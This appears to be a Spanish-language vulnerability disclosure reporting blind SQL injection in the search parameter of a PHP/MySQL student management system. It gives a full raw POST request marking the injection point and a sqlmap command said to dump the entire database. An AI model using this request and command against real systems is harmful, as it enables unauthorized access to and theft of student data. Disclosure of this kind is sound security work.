
Sistema de Gestión de Estudiantes usando PHP y MySQL
El Sistema de Gestión de Estudiantes (SMS) es una aplicación web desarrollada usando PHP y MySQL para gestionar información de estudiantes. Este repositorio contiene el código fuente y los detalles del sistema, junto con un informe de vulnerabilidad de seguridad.
Auditor:
Shoaib Alam - Perfil de LinkedIn
Se ha detectado una vulnerabilidad de Inyección SQL Ciega en el Sistema de Gestión de Estudiantes. Este problema afecta al parámetro searchdata en la funcionalidad de búsqueda de la aplicación.
/studentms/admin/search.phpsearchdataEl parámetro searchdata es susceptible a Inyección SQL Ciega debido a una sanitización inadecuada de la entrada. Un atacante podría explotar esta vulnerabilidad inyectando consultas SQL maliciosas en la entrada searchdata, obteniendo potencialmente acceso no autorizado a la base de datos u otra información sensible.
/studentms/admin/search.php
POST /studentms/admin/search.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
Origin: http://localhost
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Referer: http://localhost/studentms/admin/search.php
Cookie: PHPSESSID=kq90r1jv25kn4flrqd74v1miqd
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
searchdata=*&search=
Guarde la solicitud POST anterior en req.txt usando el Bloc de notas o cualquier editor de texto.
Utilice una herramienta como SQLMAP para explotar lo anterior aplicando este comando (puede personalizar el suyo): sqlmap -r req.txt --dbs --random-agent --level 3 --risk 3
El comando anterior volcará toda la base de datos de la aplicación web.